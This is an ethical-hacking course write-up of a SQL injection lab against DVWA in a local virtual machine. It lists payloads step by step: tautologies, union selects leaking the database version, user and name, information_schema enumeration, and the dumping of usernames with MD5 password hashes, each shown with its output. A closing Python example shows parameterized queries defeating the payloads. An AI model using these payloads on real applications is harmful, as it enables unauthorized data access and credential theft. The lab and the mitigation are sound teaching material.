Ethical Hacking, Unit 2 - Task 2: SQL injection

For the second task of unit 2, SQL injection, we need to download a VirtualBox virtual machine. The file is compressed with 7-zip and its size is 380MB: dvwa-moocHackingMU-actualizada.7z

Once the virtual machine has been downloaded and started, a screen similar to this one should appear.

[Image: virtual machine running]

To connect to the virtual machine from the browser, note the IP address it has been assigned and open the following link: http://192.168.56.101/login.php

[Image: DVWA login screen]

Once logged in, we follow steps 7, 8 and 9 of lesson 6 of the SQL injection manual.

Step 7.

The login credentials are: Username: admin Password: password

Step 8.

This consists of changing the "DVWA Security" level from high to low and clicking "Submit".

[Image: DVWA Security]

Step 9.

Manual SQL injection ("SQL Injection")

[Image: SQL Injection]

Basic SQL injection modes.

Example 1: type a 1 in "User ID:" and click "Submit".

[Image: result of entering 1]

The result obtained is produced by the following SQL statement:

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Example 2: always true: %' or '0'='0

The intent of this statement is to display every row, whether the first condition is false or true.

%' will probably not be equal to anything, so that part evaluates to false.

'0'='0 is true, because 0 is always equal to 0.

SQL statement:
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

[Image: result of %' or '0'='0]

Example 3: database version. %' or 0=0 union select null, version() #

ID: %' or 0=0 union select null, version() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, version() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, version() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, version() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, version() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, version() #
First name: 
Surname: 5.5.44-0+deb8u1

In the Surname field, the MySQL database version appears: 5.5.44-0+deb8u1

Example 4: database user. %' or 0=0 union select null, user() #

ID: %' or 0=0 union select null, user() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, user() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, user() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, user() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, user() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, user() #
First name: 
Surname: dvwa@localhost

Just as the database version could be displayed, the name of the database user that the PHP code runs its queries as, dvwa@localhost, can also be displayed.

Example 5: database name. %' or 0=0 union select null, database() #

ID: %' or 0=0 union select null, database() #
First name: admin
Surname: admin

ID: %' or 0=0 union select null, database() #
First name: Gordon
Surname: Brown

ID: %' or 0=0 union select null, database() #
First name: Hack
Surname: Me

ID: %' or 0=0 union select null, database() #
First name: Pablo
Surname: Picasso

ID: %' or 0=0 union select null, database() #
First name: Bob
Surname: Smith

ID: %' or 0=0 union select null, database() #
First name: 
Surname: dvwa

The database name is dvwa.

Example 6: display all the tables in information_schema

%' and 1=0 union select null, table_name from information_schema.tables #

Information about all the tables in information_schema:

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: CHARACTER_SETS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLLATIONS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLLATION_CHARACTER_SET_APPLICABILITY

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLUMNS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: COLUMN_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: ENGINES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: EVENTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: FILES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: GLOBAL_STATUS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: GLOBAL_VARIABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: KEY_COLUMN_USAGE

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PARAMETERS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PARTITIONS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PLUGINS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PROCESSLIST

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: PROFILING

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: REFERENTIAL_CONSTRAINTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: ROUTINES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SCHEMATA

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SCHEMA_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SESSION_STATUS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: SESSION_VARIABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: STATISTICS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLESPACES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLE_CONSTRAINTS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TABLE_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: TRIGGERS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: USER_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: VIEWS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_PAGE

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_TRX

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_POOL_STATS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_LOCK_WAITS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMPMEM

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMP

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_LOCKS

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMPMEM_RESET

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_CMP_RESET

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: INNODB_BUFFER_PAGE_LRU

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: guestbook

ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: 
Surname: users 

Example 7: display all the tables whose name starts with "User"; the users table is where the passwords are stored.

SQL statement: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

Information about all the tables with the prefix "User":

ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: USER_PRIVILEGES

ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name: 
Surname: users

Example 8: display all the columns of the users table, using information_schema

SQL statement: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Information about the users table; the following fields are identified: user_id, first_name, last_name, user, password, avatar

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
user_id

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
first_name

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
last_name

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
user

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
password

ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name: 
Surname: users
avatar

Example 9: display the contents of the users table identified through information_schema

The SQL statement:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Result of the SQL query: the contents of all the fields appear, including the password.

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: admin
admin
admin
5f4dcc3b5aa765d61d8327deb882cf99

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Gordon
Brown
gordonb
e99a18c428cb38d5f260853678922e03

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Hack
Me
1337
8d3533d75ae2c3966d7e0d4fcc69216b

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Pablo
Picasso
pablo
0d107d09f5bbe40cade3de5c71e9e9b7

ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name: 
Surname: Bob
Smith
smithy
5f4dcc3b5aa765d61d8327deb882cf99
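The examples above all work because DVWA's low-security page pastes the "User ID" value straight into the SQL text (the $getid line shown in Example 1). The following is an added example, not part of the original post or of DVWA: it rebuilds that query in Python over an in-memory SQLite table with constructed sample rows, runs the tautology payload from Example 2 and a version-leaking union payload in the style of Example 3 against both the string-concatenated query and a parameterized one, and shows that the parameterized query treats the payload as a plain value. Because SQLite uses -- rather than MySQL's # for comments and sqlite_version() instead of version(), the union payload is adapted accordingly; the password column holds placeholder strings, not the hashes from the page.

```python
import sqlite3

# Constructed sample rows mirroring the shape of DVWA's users table
# (first names from the page; password values are placeholders).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "<hash-placeholder>"),
    (2, "Gordon", "Brown", "gordonb", "<hash-placeholder>"),
    (3, "Hack", "Me", "1337", "<hash-placeholder>"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    # Same shape as DVWA's low-security query: the input becomes part of the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # The fix: the value travels separately from the SQL text, so quotes, OR,
    # UNION and comment markers inside it are compared as data, never parsed.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    conn = make_db()
    tautology = "%' or '0'='0"                                   # Example 2 payload
    union = "%' and 1=0 union select null, sqlite_version() --"  # Example 3, SQLite syntax
    return {
        "normal": lookup_vulnerable(conn, "1"),            # one row, as in Example 1
        "vuln_tautology": lookup_vulnerable(conn, tautology),  # every row
        "vuln_union": lookup_vulnerable(conn, union),      # (None, '<sqlite version>')
        "safe_tautology": lookup_parameterized(conn, tautology),  # no rows
        "safe_union": lookup_parameterized(conn, union),          # no rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```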
